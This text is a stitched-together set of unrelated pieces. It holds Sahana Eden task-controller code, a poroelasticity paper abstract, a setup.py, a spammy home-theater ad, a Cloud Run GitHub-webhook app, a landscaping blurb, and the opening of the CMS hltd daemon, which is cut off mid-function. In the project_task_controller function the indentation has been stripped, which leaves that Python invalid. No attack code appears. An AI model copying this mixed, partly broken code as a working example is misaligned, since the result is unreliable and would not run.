    # NOTE(review): if resourcename matches none of the branches above,
    # rheader is unbound here and this raises NameError - confirm all
    # callers pass one of the handled resource names
    return rheader
# =============================================================================
def project_task_form_inject(r, output, project=True):
    """
        Inject Project, Activity & Milestone fields into a Task form

        @param r: the S3Request
        @param output: the controller output dict (expects "form" to be a
                       standard SQLFORM table layout)
        @param project: whether to inject the Project selector too
        @return: the modified output dict

        @ToDo: Re-implement using http://eden.sahanafoundation.org/wiki/S3SQLForm
    """

    T = current.T
    db = current.db
    s3db = current.s3db
    auth = current.auth
    s3 = current.response.s3
    settings = current.deployment_settings

    sep = ": "
    s3_formstyle = settings.get_ui_formstyle()

    # ---------------------------------------------------------------------
    # Activity selector: default to the task's currently-linked activity
    table = s3db.project_task_activity
    field = table.activity_id
    default = None
    if r.component_id:
        query = (table.task_id == r.component_id)
        default = db(query).select(field,
                                   limitby=(0, 1)).first()
        if default:
            default = default.activity_id
    elif r.id:
        query = (table.task_id == r.id)
        default = db(query).select(field,
                                   limitby=(0, 1)).first()
        if default:
            default = default.activity_id
    if not default:
        default = field.default

    field_id = "%s_%s" % (table._tablename, field.name)
    if r.component:
        # Component view: limit options to this project's activities
        requires = {}
        table = db.project_activity
        query = (table.project_id == r.id)
        rows = db(query).select(table.id, table.name)
        for row in rows:
            requires[row.id] = row.name
        field.requires = IS_IN_SET(requires)
    else:
        # Options get filled client-side based on the selected Project
        if default:
            field.requires = IS_IN_SET([default])
        else:
            field.requires = IS_IN_SET([])

    widget = SQLFORM.widgets.options.widget(field, default)
    label = field.label
    label = LABEL(label, label and sep, _for=field_id,
                  _id=field_id + SQLFORM.ID_LABEL_SUFFIX)
    comment = S3AddResourceLink(T("Add Activity"),
                                c="project",
                                f="activity",
                                tooltip=T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'."))
    if project:
        # Refresh the Activity options when the Project changes
        options = {"triggerName": "project_id",
                   "targetName": "activity_id",
                   "lookupPrefix": "project",
                   "lookupResource": "activity",
                   "optional": True,
                   }
        s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
    row_id = field_id + SQLFORM.ID_ROW_SUFFIX
    row = s3_formstyle(row_id, label, widget, comment)
    try:
        output["form"][0].insert(0, row[1])
    except:
        # A non-standard formstyle with just a single row
        pass
    try:
        output["form"][0].insert(0, row[0])
    except:
        pass

    # ---------------------------------------------------------------------
    # Milestones
    if settings.get_project_milestones():
        table = s3db.project_task_milestone
        field = table.milestone_id
        if project and r.id:
            # Default to the task's currently-linked milestone
            query = (table.task_id == r.id)
            default = db(query).select(field,
                                       limitby=(0, 1)).first()
            if default:
                default = default.milestone_id
        else:
            default = field.default
        field_id = "%s_%s" % (table._tablename, field.name)
        # Options will be added later based on the Project
        if default:
            field.requires = IS_IN_SET({default:field.represent(default)})
        else:
            field.requires = IS_IN_SET([])
        #widget = SELECT(_id=field_id, _name=field.name)
        widget = SQLFORM.widgets.options.widget(field, default)
        label = field.label
        label = LABEL(label, label and sep, _for=field_id,
                      _id=field_id + SQLFORM.ID_LABEL_SUFFIX)
        comment = S3AddResourceLink(T("Add Milestone"),
                                    c="project",
                                    f="milestone",
                                    tooltip=T("If you don't see the milestone in the list, you can add a new one by clicking link 'Add Milestone'."))
        options = {"triggerName": "project_id",
                   "targetName": "milestone_id",
                   "lookupPrefix": "project",
                   "lookupResource": "milestone",
                   "optional": True,
                   }
        s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
        row_id = field_id + SQLFORM.ID_ROW_SUFFIX
        row = s3_formstyle(row_id, label, widget, comment)
        try:
            output["form"][0].insert(14, row[1])
            output["form"][0].insert(14, row[0])
        except:
            # A non-standard formstyle with just a single row
            pass
        try:
            # NOTE(review): if the inserts at 14 above succeeded, this
            # inserts row[0] a second time (at index 7) - confirm intended
            output["form"][0].insert(7, row[0])
        except:
            pass

    # ---------------------------------------------------------------------
    # Project selector
    if project:
        vars = current.request.get_vars
        if "project" in vars:
            # Fixed Project from the URL: pass it through as a hidden field
            widget = INPUT(value=vars.project, _name="project_id")
            row = s3_formstyle("project_task_project__row", "",
                               widget, "", hidden=True)
        else:
            table = s3db.project_task_project
            field = table.project_id
            if r.id:
                # Default to the task's currently-linked project
                query = (table.task_id == r.id)
                default = db(query).select(table.project_id,
                                           limitby=(0, 1)).first()
                if default:
                    default = default.project_id
            else:
                default = field.default
            widget = field.widget or SQLFORM.widgets.options.widget(field, default)
            field_id = "%s_%s" % (table._tablename, field.name)
            label = field.label
            label = LABEL(label, label and sep, _for=field_id,
                          _id=field_id + SQLFORM.ID_LABEL_SUFFIX)
            comment = field.comment if auth.s3_has_role("STAFF") else ""
            row_id = field_id + SQLFORM.ID_ROW_SUFFIX
            row = s3_formstyle(row_id, label, widget, comment)
        try:
            output["form"][0].insert(0, row[1])
        except:
            # A non-standard formstyle with just a single row
            pass
        try:
            output["form"][0].insert(0, row[0])
        except:
            pass

    return output
# =============================================================================
def project_task_controller():
"""
Tasks Controller, defined in the model for use from
multiple controllers for unified menus
"""
T = current.T
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
vars = current.request.get_vars
# Pre-process
def prep(r):
tablename = "project_task"
table = s3db.project_task
statuses = s3.project_task_active_statuses
crud_strings = s3.crud_strings[tablename]
if r.record:
if r.interactive:
# Put the Comments in the RFooter
project_ckeditor()
s3.rfooter = LOAD("project", "comments.load",
args=[r.id],
ajax=True)
elif "mine" in vars:
# Show the Open Tasks for this User
if auth.user:
pe_id = auth.user.pe_id
s3.filter = (table.pe_id == pe_id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("My Open Tasks")
crud_strings.msg_list_empty = T("No Tasks Assigned")
s3db.configure(tablename,
copyable=False,
listadd=False)
try:
# Add Project
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(4, (T("Project"), "task_project.project_id"))
# Hide the Assignee column (always us)
list_fields.remove("pe_id")
# Hide the Status column (always 'assigned' or 'reopened')
list_fields.remove("status")
s3db.configure(tablename,
list_fields=list_fields)
except:
pass
elif "project" in vars:
# Show Open Tasks for this Project
project = vars.project
ptable = s3db.project_project
try:
name = current.db(ptable.id == project).select(ptable.name,
limitby=(0, 1)).first().name
except:
current.session.error = T("Project not Found")
redirect(URL(args=None, vars=None))
if r.method == "search":
# @ToDo: get working
r.get_vars = {"task_search_project": name,
"task_search_status": ",".join([str(status) for status in statuses])
}
else:
ltable = s3db.project_task_project
s3.filter = (ltable.project_id == project) & \
(ltable.task_id == table.id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("Open Tasks for %(project)s") % dict(project=name)
crud_strings.title_search = T("Search Open Tasks for %(project)s") % dict(project=name)
crud_strings.msg_list_empty = T("No Open Tasks for %(project)s") % dict(project=name)
# Add Activity
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(2, (T("Activity"), "task_activity.activity_id"))
s3db.configure(tablename,
# Block Add until we get the injectable component lookups
insertable=False,
deletable=False,
copyable=False,
list_fields=list_fields)
elif "open" in vars:
# Show Only Open Tasks
crud_strings.title_list = T("All Open Tasks")
s3.filter = (table.status.belongs(statuses))
else:
crud_strings.title_list = T("All Tasks")
crud_strings.title_search = T("All Tasks")
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(3, (T("Project"), "task_project.project_id"))
list_fields.insert(4, (T("Activity"), "task_activity.activity_id"))
if r.component:
if r.component_name == "req":
if current.deployment_settings.has_module("hrm"):
r.component.table.type.default = 3
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
s3db.req_create_form_mods()
elif r.component_name == "human_resource":
r.component.table.type.default = 2
else:
if not auth.s3_has_role("STAFF"):
# Hide fields to avoid confusion (both of inputters & recipients)
table = r.table
field = table.time_actual
field.readable = field.writable = False
return True
s3.prep = prep
# Post-process
    # Post-process: decorate interactive task views after the main handler ran.
    def postp(r, output):
        """REST post-processor for project task requests.

        r: the current S3 request object; output: the handler's output dict.
        Returns output, possibly with extra form controls injected.
        """
        if r.interactive:
            # Only decorate primary (non-component), non-import requests
            if not r.component and \
               r.method != "import":
                # Keep the current URL vars on the per-row update links
                # (vars is a closure variable from the enclosing controller)
                update_url = URL(args=["[id]"], vars=vars)
                current.manager.crud.action_buttons(r,
                                                    update_url=update_url)
                if not r.method in ("search", "report") and \
                   "form" in output:
                    # Insert fields to control the Project, Activity & Milestone
                    output = project_task_form_inject(r, output)
        return output
s3.postp = postp
if "mine" in vars or \
"project" in vars:
hide_filter = True
else:
hide_filter = False
return current.rest_controller("project", "task",
rheader=s3db.project_rheader,
hide_filter=hide_filter,
)
# END =========================================================================
|
Keywords Meshless Local Petrov-Galerkin; Moving Least Squares; Analytical Integration; Shape Function Derivatives; Poroelastodynamics; Independent Phase Discretization.
Abstract This work proposes a modified procedure, based on analytical integrations, to analyse poroelastic models discretized by time-domain Meshless Local Petrov-Galerkin formulations. In this context, Taylor series expansions of the unknown fields are considered, and the related integrals of the meshless formulations are solved analytically, rendering a so-called modified methodology. The work is based on the u-p formulation, and the unknown fields of the coupled analysis in focus are the solid skeleton displacements and the interstitial fluid pore pressures. Independent spatial discretization is considered for each phase of the model, rendering a more flexible and efficient methodology. The Moving Least Squares approximation is employed for the spatial variation of the displacement and pore-pressure fields, and two variants of the meshless local Petrov-Galerkin formulation are discussed here, which are based on the use of Heaviside or Gaussian weight test functions. Modified expressions to properly compute the shape function derivatives are also considered. At the end of the paper, numerical examples illustrate the performance and potentialities of the proposed techniques.
|
# Copyright (c) 2014, Stavros Sachtouris
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from setuptools import setup
import triaina

# Read the long description with a context manager so the file handle is
# closed deterministically (the previous bare open().read() leaked it).
with open('README.md') as readme:
    long_description = readme.read()

# Package metadata for the triaina distribution.
setup(
    name='triaina',
    version=triaina.__version__,
    description=('A kamaki clone done differently'),
    long_description=long_description,
    url='http://github.com/saxtouri/triaina',
    download_url='https://github.com/saxtouri/triaina/archive/master.zip',
    license='BSD',
    author='Stavros Sachtouris',
    author_email='saxtouri@gmail.com',
    maintainer='Stavros Sachtouris',
    maintainer_email='saxtouri@gmail.com',
    packages=['triaina', ],
    classifiers=[
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'Environment :: Console',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Topic :: System :: Shells',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: Utilities'
    ],
    include_package_data=True,
    entry_points={
    },
    install_requires=[]
)
|
Here at Home Theater Installation Pro, we'll be ready to satisfy your needs regarding Home Theater Installation in Melbourne, IA. You'll need the most innovative modern technology in the field, and our crew of highly skilled professionals will offer just that. We guarantee that you get the best services, the best value, and the highest quality materials. We will help you to come up with decisions for the task, respond to all your questions, and organize an appointment with our workers whenever you call us at 844-244-6355.
You will have a budget to stick to, and you need to cut costs. Still you require superior services on Home Theater Installation in Melbourne, IA, so you can rely on us to help you save money while continuing with offering the highest quality services. We offer the highest quality even while still saving you money. If you work with us, you'll receive the advantage of our own practical knowledge and superior materials to be sure that your project can last even while saving time and cash. For example, we are alert to keep clear of costly mistakes, do the job promptly to help save hours, and guarantee that you receive the top discounts on supplies and work. If you need to get lower rates, Home Theater Installation Pro is the company to contact. Dial 844-244-6355 to talk to our client care staff, right now.
You will need to be informed when it comes to Home Theater Installation in Melbourne, IA. We won't encourage you to come up with ill advised judgments, as we know exactly what we'll be working at, and we make sure you know very well what to expect from the project. That's why we make every effort to be sure that you understand the procedure and aren't confronted by any surprises. Begin by calling 844-244-6355 to talk about your job. We'll resolve all of your questions and schedule the initial meeting. We are going to work together with you throughout the whole project, and our company will appear on time and ready.
Lots of reasons exist to decide on Home Theater Installation Pro for Home Theater Installation in Melbourne, IA. Our supplies are of the highest quality, our cash saving solutions are practical and powerful, and our customer support ratings won't be beat. Our company has the experience that you need to fulfill your goals and objectives. When you need Home Theater Installation in Melbourne, call Home Theater Installation Pro by dialing 844-244-6355, and we will be pleased to help you.
|
# Copyright 2019 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hmac
import json
import os
import sys
import time
import urllib
# `import urllib` alone does not guarantee the `urllib.request` submodule is
# loaded; import it explicitly since this module uses urllib.request.*.
import urllib.request
from hashlib import sha1

from flask import Flask, request
from google.cloud import secretmanager_v1beta1
app = Flask(__name__)


@app.route("/", methods=["POST"])
def index():
    """Webhook endpoint for GitHub issue events.

    Verifies the HMAC signature, records the event in BigQuery and, for
    newly opened issues, notifies Slack and posts an auto-reply comment.
    Returns 204 on success, 403 when the signature does not verify.
    """
    signature = request.headers.get("X-Hub-Signature", None)
    body = request.data
    # Only process data with a valid signature. Use an explicit check instead
    # of `assert`, which is silently stripped when running under `python -O`.
    if not verify_signature(signature, body):
        return ("Unverified Signature", 403)
    # Load the event as JSON for easier handling
    event = request.get_json(force=True)
    # Insert row into bigquery
    insert_row_into_bigquery(event)
    # Post new issues to Slack and acknowledge them on GitHub
    if event["action"] == "opened":
        issue_title = event["issue"]["title"]
        issue_url = event["issue"]["html_url"]
        send_issue_notification_to_slack(issue_title, issue_url)
        # Post response to Github
        create_issue_comment(event["issue"]["url"])
    print("Yay")
    sys.stdout.flush()
    return ("", 204)
def verify_signature(signature, body):
    """Check GitHub's `X-Hub-Signature` header against an HMAC-SHA1 of body.

    signature: header value of the form "sha1=<hexdigest>", or None.
    body: raw request payload (bytes).
    Returns True only when the signature matches the expected digest.
    """
    if not signature:
        # Header absent: cannot possibly verify. This also avoids the
        # TypeError that hmac.compare_digest(None, str) would raise.
        return False
    expected_signature = "sha1="
    try:
        # Get secret from Cloud Secret Manager
        secret = get_secret(
            os.environ.get("PROJECT_NAME"), os.environ.get("SECRET_NAME"), "1"
        )
        # Compute the hashed signature
        hashed = hmac.new(secret, body, sha1)
        expected_signature += hashed.hexdigest()
    except Exception as e:
        # On any failure the expected signature stays "sha1=" and the
        # comparison below fails closed.
        print(e)
    return hmac.compare_digest(signature, expected_signature)
def send_issue_notification_to_slack(issue_title, issue_url):
    """Post a "new issue created" message to the Slack webhook in SLACK_URL.

    issue_title / issue_url: strings describing the GitHub issue.
    Raises urllib.error.URLError / HTTPError if delivery fails.
    """
    msg = {
        "blocks": [
            {
                "type": "section",
                "text": {
                    "type": "mrkdwn",
                    "text": f"New issue created: <{issue_url}|{issue_title}>",
                },
            }
        ]
    }
    req = urllib.request.Request(
        os.environ.get("SLACK_URL"),
        data=json.dumps(msg).encode("utf8"),
        headers={"Content-Type": "application/json"},
    )
    # The response body is not used; drop the previously-unused local binding.
    urllib.request.urlopen(req)
def insert_row_into_bigquery(event):
    """Append one (title, action, url, timestamp) row for a GitHub issue
    event to the BigQuery table named by the DATASET/TABLE env vars."""
    from google.cloud import bigquery

    # Resolve the destination table from environment configuration.
    client = bigquery.Client()
    table_ref = client.dataset(os.environ.get("DATASET")).table(
        os.environ.get("TABLE")
    )
    table = client.get_table(table_ref)

    issue = event["issue"]
    rows = [
        (
            issue["title"],
            event["action"],
            issue["html_url"],
            time.time(),
        )
    ]
    bq_errors = client.insert_rows(table, rows)
    if bq_errors:
        # Surface insert failures as a structured WARNING for Stackdriver.
        entry = {
            "severity": "WARNING",
            "msg": "Row not inserted.",
            "errors": bq_errors,
            "row": rows,
        }
        print(json.dumps(entry))
def create_issue_comment(api_url):
    """Post an automatic acknowledgement comment on a GitHub issue.

    api_url: the issue's REST API URL; "/comments" is appended for the POST.
    Authenticates as a GitHub App installation; failures are logged, not raised.
    """
    # Get tokens
    pem = get_secret(os.environ.get("PROJECT_NAME"), os.environ.get("PEM"), "1")
    app_token = get_jwt(pem)
    installation_token = get_installation_token(app_token)
    # Create Github issue comment via HTTP POST
    try:
        msg = {
            "body": "Thank you for filing an issue. \
Someone will respond within 24 hours."
        }
        req = urllib.request.Request(
            api_url + "/comments", data=json.dumps(msg).encode("utf8")
        )
        req.add_header("Authorization", f"Bearer {installation_token}")
        # NOTE(review): response is unused; the call is best-effort.
        response = urllib.request.urlopen(req)
    except Exception as e:
        print(e)
def get_jwt(pem):
    """Return a short-lived (10 minute) RS256-signed JWT for the GitHub App,
    signed with the supplied PEM private key bytes."""
    from jwt import JWT, jwk_from_pem

    claims = {
        "iat": int(time.time()),
        "exp": int(time.time()) + (10 * 60),
        "iss": os.environ.get("APP_ID"),
    }
    signer = JWT()
    return signer.encode(claims, jwk_from_pem(pem), "RS256")
def get_installation_token(jwt):
    """Exchange an App JWT for an installation access token via the GitHub
    API endpoint named by the INSTALLATION env var."""
    req = urllib.request.Request(os.environ.get("INSTALLATION"), method="POST")
    for header, value in (
        ("Authorization", f"Bearer {jwt}"),
        ("Accept", "application/vnd.github.machine-man-preview+json"),
    ):
        req.add_header(header, value)
    payload = json.loads(urllib.request.urlopen(req).read())
    return payload["token"]
def get_secret(project_name, secret_name, version_num):
    """Return the payload bytes of a secret version from Cloud Secret Manager."""
    sm_client = secretmanager_v1beta1.SecretManagerServiceClient()
    version_path = sm_client.secret_version_path(
        project_name, secret_name, version_num
    )
    version = sm_client.access_secret_version(version_path)
    return version.payload.data
if __name__ == "__main__":
    # Read PORT once; an unset or empty value falls back to 8080
    # (the previous form called os.getenv twice).
    PORT = int(os.getenv("PORT") or 8080)
    # This is used when running locally. Gunicorn is used to run the
    # application on Cloud Run. See entrypoint in Dockerfile.
    app.run(host="127.0.0.1", port=PORT, debug=True)
|
Unique Small Backyard Landscaping Ideas Australia – Most homeowners understand that buying a property often comes along with a certain amount of compromise. For some, this usually means making peace with a yard that is cozy instead of sprawling grounds. We have compiled some yard layout ideas to help turn this compromise.
Your lawn can be converted into a space that you and your family can enjoy for years to come. In addition, if you are planning on selling your home in the future, even though it could be further down the road, the right design could turn a selling feature into an appreciating asset.
In terms of how to go about re-imagining the space, style will undoubtedly play a pivotal part, but careful planning is what will ensure success. Our small backyard ideas will have you relaxing in a space that is both aesthetically gratifying and functional — you will not even be thinking about the square footage.
|
#!/bin/env python
import os,sys
sys.path.append('/opt/hltd/python')
sys.path.append('/opt/hltd/lib')
import time
import datetime
import dateutil.parser
import logging
import subprocess
from signal import SIGKILL
from signal import SIGINT
import simplejson as json
#import SOAPpy
import threading
import CGIHTTPServer
import BaseHTTPServer
import cgitb
import httplib
import demote
import re
import shutil
import socket
#import fcntl
#import random
#modules distributed with hltd
import prctl
#modules which are part of hltd
from daemon2 import Daemon2
from hltdconf import *
from inotifywrapper import InotifyWrapper
import _inotify as inotify
from elasticbu import BoxInfoUpdater
from aUtils import fileHandler,ES_DIR_NAME
from setupES import setupES
# ---------------------------------------------------------------------------
# Module-level state shared across the daemon's threads and handlers.
# ---------------------------------------------------------------------------
thishost = os.uname()[1]  # short hostname of this machine
# CMSSW process geometry; filled in by calculate_threadnumber()
nthreads = None
nstreams = None
expected_processes = None
runList = None
# Mounted BU disk paths (data interface); *_instance variants point at the
# per-instance subdirectory when not running as the 'main' instance.
bu_disk_list_ramdisk=[]
bu_disk_list_output=[]
bu_disk_list_ramdisk_instance=[]
bu_disk_list_output_instance=[]
# Control-interface (CI) ramdisk mount, set up by cleanup_mountpoints()
bu_disk_ramdisk_CI = None
bu_disk_ramdisk_CI_instance = None
# Locks: resource-file moves, and serializing NFS-related subprocess calls
resource_lock = threading.Lock()
nsslock = threading.Lock()
# Cloud-mode state machine flags
suspended=False
entering_cloud_mode=False
exiting_cloud_mode=False
cloud_mode=False
abort_cloud_mode=False
cached_pending_run = None
resources_blocked_flag=False
disabled_resource_allocation=False
masked_resources=False
fu_watchdir_is_mountpoint=False
ramdisk_submount_size=0  # bytes consumed by loop submounts; see submount_size()
machine_blacklist=[]
boxinfoFUMap = {}  # per-FU box info cache
boxdoc_version = 1  # version tag written into box info documents
logCollector = None  # handle of the logcollector.py subprocess
q_list = []  # quarantined resource bookkeeping
num_excluded=0  # number of cores excluded by resource_use_fraction
dqm_globalrun_filepattern = '.run{0}.global'
def setFromConf(myinstance):
    """Load the hltd configuration for *myinstance* and initialize the
    module-level resource-state directory paths and logging.

    myinstance: instance name string; 'main' denotes the default instance.
    """
    global conf
    global logger
    global idles
    global used
    global broken
    global quarantined
    global cloud
    conf=initConf(myinstance)
    # Resource accounting directories: one file per CPU core, moved between
    # these state directories by the daemon.
    idles = conf.resource_base+'/idle/'
    used = conf.resource_base+'/online/'
    broken = conf.resource_base+'/except/'
    quarantined = conf.resource_base+'/quarantined/'
    cloud = conf.resource_base+'/cloud/'
    #prepare log directory
    if myinstance!='main':
        if not os.path.exists(conf.log_dir): os.makedirs(conf.log_dir)
        if not os.path.exists(os.path.join(conf.log_dir,'pid')): os.makedirs(os.path.join(conf.log_dir,'pid'))
        # world-writable so per-process loggers running as conf.user can write
        os.chmod(conf.log_dir,0777)
        os.chmod(os.path.join(conf.log_dir,'pid'),0777)
    logging.basicConfig(filename=os.path.join(conf.log_dir,"hltd.log"),
                        level=conf.service_log_level,
                        format='%(levelname)s:%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    logger = logging.getLogger(os.path.basename(__file__))
    conf.dump()
def preexec_function():
    # Runs in the child process between fork and exec: drop privileges to
    # conf.user and request SIGKILL delivery when the parent (hltd) dies,
    # so spawned helpers never outlive the daemon.
    dem = demote.demote(conf.user)
    dem()
    prctl.set_pdeathsig(SIGKILL)
    # os.setpgrp()
def cleanup_resources():
    """Return every resource file to the 'idle' state, then quarantine the
    fraction excluded by conf.resource_use_fraction.

    Returns True on success, False (with a warning logged) on any error.
    """
    global num_excluded
    try:
        # Drain all non-idle state directories back into 'idle'.
        for source in (cloud, broken, used, quarantined):
            for cpu in os.listdir(source):
                os.rename(source + cpu, idles + cpu)
        idle_files = os.listdir(idles)
        # Quarantine files beyond the use-fraction limit (rounded to the
        # closest integer).
        num_excluded = int(round(len(idle_files) * (1. - conf.resource_use_fraction)))
        for name in idle_files[:int(num_excluded)]:
            os.rename(idles + name, quarantined + name)
        return True
    except Exception as ex:
        logger.warning(str(ex))
        return False
def move_resources_to_cloud():
    """Move every resource file (broken, used, quarantined, idle) into the
    'cloud' state directory and clear the quarantine bookkeeping list."""
    global q_list
    for src in (broken, used, quarantined):
        for cpu in os.listdir(src):
            os.rename(src + cpu, cloud + cpu)
    q_list = []
    # The original code listed and moved the idle directory twice in a row
    # (verbatim copy-paste); a single pass is sufficient and equivalent.
    for cpu in os.listdir(idles):
        os.rename(idles + cpu, cloud + cpu)
def has_active_resources():
    """Return True when any resource file exists in broken, used or idle."""
    return any(len(os.listdir(state_dir)) for state_dir in (broken, used, idles))
#interfaces to the cloud igniter script
def ignite_cloud():
    """Invoke the cloud igniter script with 'start'.

    Returns True when the script exits 0, False otherwise (including when
    the script is missing or cannot be executed).
    """
    try:
        igniter = subprocess.Popen(
            [conf.cloud_igniter_path, 'start'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        out = igniter.communicate()[0]
        if igniter.returncode == 0:
            return True
        logger.error("cloud igniter start returned code " + str(igniter.returncode))
        if igniter.returncode > 1:
            logger.error(out)
    except OSError as ex:
        # errno 2: the igniter script itself is not installed
        if ex.errno == 2:
            logger.warning(conf.cloud_igniter_path + ' is missing')
        else:
            logger.error("Failed to run cloud igniter start")
            logger.exception(ex)
    return False
def extinguish_cloud():
    """Invoke the cloud igniter script with 'stop'.

    Returns True when the script exits 0 or 1, False otherwise (including
    when the script is missing or cannot be executed).
    """
    try:
        proc = subprocess.Popen([conf.cloud_igniter_path,'stop'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        out = proc.communicate()[0]
        if proc.returncode in [0,1]:
            return True
        else:
            logger.error("cloud igniter stop returned "+str(proc.returncode))
            if len(out):logger.error(out)
    except OSError as ex:
        if ex.errno==2:
            logger.warning(conf.cloud_igniter_path + ' is missing')
        else:
            # Fixed copy-pasted message: this is the 'stop' action, not 'start'.
            logger.error("Failed to run cloud igniter stop")
            logger.exception(ex)
    return False
def is_cloud_inactive():
    """Invoke the cloud igniter script with 'status'.

    Returns the script's exit code (by convention non-zero means inactive),
    or 100 when the script cannot be executed at all.
    """
    try:
        proc = subprocess.Popen([conf.cloud_igniter_path,'status'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        out = proc.communicate()[0]
        if proc.returncode >1:
            logger.error("cloud igniter status returned error code "+str(proc.returncode))
            logger.error(out)
    except OSError as ex:
        if ex.errno==2:
            logger.warning(conf.cloud_igniter_path + ' is missing')
        else:
            # Fixed copy-pasted message: this is the 'status' action, not 'start'.
            logger.error("Failed to run cloud igniter status")
            logger.exception(ex)
        return 100
    return proc.returncode
def umount_helper(point,attemptsLeft=3,initial=True):
    """Unmount *point*, escalating from a plain 'umount' to 'fuser -km' plus
    'umount -f' retries.

    point: mount point path (without leading '/').
    attemptsLeft: remaining forced-umount attempts before giving up.
    initial: True for the first (gentle) attempt; recursion passes False.
    Returns True on success (a returncode < 2 is treated as benign, e.g.
    'not mounted'), False once the attempts are exhausted.
    """
    if initial:
        try:
            logger.info('calling umount of '+point)
            subprocess.check_call(['umount',point])
        except subprocess.CalledProcessError, err1:
            # returncode 1 is treated as benign (presumably 'not mounted')
            if err1.returncode<2:return True
            if attemptsLeft<=0:
                logger.error('Failed to perform umount of '+point+'. returncode:'+str(err1.returncode))
                return False
            logger.warning("umount failed, trying to kill users of mountpoint "+point)
            try:
                # nsslock serializes fuser with other NFS-related subprocesses
                nsslock.acquire()
                f_user = subprocess.Popen(['fuser','-km',os.path.join('/'+point,conf.ramdisk_subdirectory)],shell=False,preexec_fn=preexec_function,close_fds=True)
                nsslock.release()
                f_user.wait()
            except:
                # make sure the lock is released even if fuser failed to spawn
                try:nsslock.release()
                except:pass
            # retry with force from now on
            return umount_helper(point,attemptsLeft-1,initial=False)
    else:
        attemptsLeft-=1
        time.sleep(.5)
        try:
            logger.info("trying umount -f of "+point)
            subprocess.check_call(['umount','-f',point])
        except subprocess.CalledProcessError, err2:
            if err2.returncode<2:return True
            if attemptsLeft<=0:
                logger.error('Failed to perform umount -f of '+point+'. returncode:'+str(err2.returncode))
                return False
            return umount_helper(point,attemptsLeft,initial=False)
    return True
def cleanup_mountpoints(remount=True):
    """Unmount all per-BU NFS mountpoints and rebuild the bu_disk_* globals.

    With remount=True the BUs listed in bus.config are pinged and their
    ramdisk/output exports are (re)mounted, plus an extra control-interface
    (CI) ramdisk mount when conf.mount_control_path is set.  With
    remount=False only the unmount pass is performed.
    Returns True/False; may call sys.exit() on fatal mount errors.
    """
    global bu_disk_list_ramdisk
    global bu_disk_list_ramdisk_instance
    global bu_disk_list_output
    global bu_disk_list_output_instance
    global bu_disk_ramdisk_CI
    global bu_disk_ramdisk_CI_instance
    bu_disk_list_ramdisk = []
    bu_disk_list_output = []
    bu_disk_list_ramdisk_instance = []
    bu_disk_list_output_instance = []
    bu_disk_ramdisk_CI=None
    bu_disk_ramdisk_CI_instance=None
    # An absolute bu_base_dir means a single fixed/local BU directory: no NFS
    # handling needed, just make sure the subdirectories exist.
    if conf.bu_base_dir[0] == '/':
        bu_disk_list_ramdisk = [os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory)]
        bu_disk_list_output = [os.path.join(conf.bu_base_dir,conf.output_subdirectory)]
        if conf.instance=="main":
            bu_disk_list_ramdisk_instance = bu_disk_list_ramdisk
            bu_disk_list_output_instance = bu_disk_list_output
        else:
            bu_disk_list_ramdisk_instance = [os.path.join(bu_disk_list_ramdisk[0],conf.instance)]
            bu_disk_list_output_instance = [os.path.join(bu_disk_list_output[0],conf.instance)]
        #make subdirectories if necessary and return
        if remount==True:
            try:
                os.makedirs(os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory))
            except OSError:
                pass
            try:
                os.makedirs(os.path.join(conf.bu_base_dir,conf.output_subdirectory))
            except OSError:
                pass
        return True
    try:
        # Discover currently-mounted /<bu_base_dir>N and -CI mountpoints by
        # parsing the output of 'mount'.
        process = subprocess.Popen(['mount'],stdout=subprocess.PIPE)
        out = process.communicate()[0]
